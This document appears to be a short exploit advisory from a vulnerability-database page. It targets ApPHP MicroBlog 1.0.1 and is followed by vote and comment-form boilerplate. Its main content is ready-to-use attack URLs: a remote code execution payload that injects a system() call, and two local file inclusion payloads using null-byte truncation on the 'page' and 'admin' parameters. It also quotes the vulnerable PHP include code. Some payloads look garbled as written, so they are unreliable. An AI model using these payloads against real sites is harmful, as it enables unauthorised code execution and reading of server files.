ApPHP MicroBlog 1.0.1 - Multiple Vulnerability (LFI/RCE)

2014.04.27

Credit: JIKO

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

----------[exploit Debut]
[Multiple Vulnerability]
----------[Script Info]
  
Moi : JIKO
Site    : No-exploit.Com
 
  
----------[Script Info]
  
Site        : http://www.apphp.com
Download    : http://www.apphp.com/downloads_free/php_microblog_101.zip
  
----------[exploit Info]
  
~[RCE]
http://path/index.php?jiko);system((dir)=/
~[LFI]
http://path/index.php?index.php?page=FILE%00 (you need to baypass the filter)
http://path/index.php?index.php?admin=FILE%00 (you need to baypass the filter)
 
if (($page != "") && file_exists("page/" . $page . ".php")) {
                        include_once("page/" . $page . 
 
".php");
                    } else if (($admin != "") && 
 
file_exists("admin/" . $admin . ".php")) {
                        include_once("admin/" . $admin 
 
. ".php");
                    } 
----------[exploit Fin]

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

ApPHP MicroBlog 1.0.1 - Multiple Vulnerability (LFI/RCE)

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.